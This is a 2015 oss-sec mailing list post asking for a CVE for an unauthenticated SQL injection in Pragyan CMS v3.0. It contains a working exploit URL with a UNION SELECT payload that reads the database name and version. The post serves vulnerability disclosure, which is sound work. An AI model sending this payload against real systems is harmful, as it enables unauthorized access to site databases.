oss-sec mailing list archives

CVE-Request -- Pragyan CMS v.3.0 -- SQL injection vulnerability

From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Tue, 3 Feb 2015 21:46:01 +0100

Hi Steve, Josh, vendors, list.

I found an SQL injection vulnerability in Pragyan CMS v. 3.0.

Attackers can exploit that vulnerability by appending arbitrary SQL queries
to a registered users profile id without being authenticated.

Exploit-Example:

http://
{TARGET}/user:1%27+and+1=2+union+select+database%28%29,version%28%29,3+--+

Can you please assign a CVE-ID for that?

Thank you!

Greetings.

Steffen Rösemann

References:

[1] http://delta.nitt.edu/ / https://github.com/delta/pragyan
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-11.html
[3] https://github.com/delta/pragyan/issues/206
[4] https://github.com/sroesemann/pragyan
[5] http://pastebin.com/ip2gGYuS
[6] http://sroesemann.blogspot.de/2015/02/advisory-for-sroeadv-2015-11.html
[7] http://seclists.org/fulldisclosure/2015/Feb/18

Current thread:

CVE-Request -- Pragyan CMS v.3.0 -- SQL injection vulnerability Steffen Rösemann (Feb 03)
- Re: CVE-Request -- Pragyan CMS v.3.0 -- SQL injection vulnerability cve-assign (Feb 03)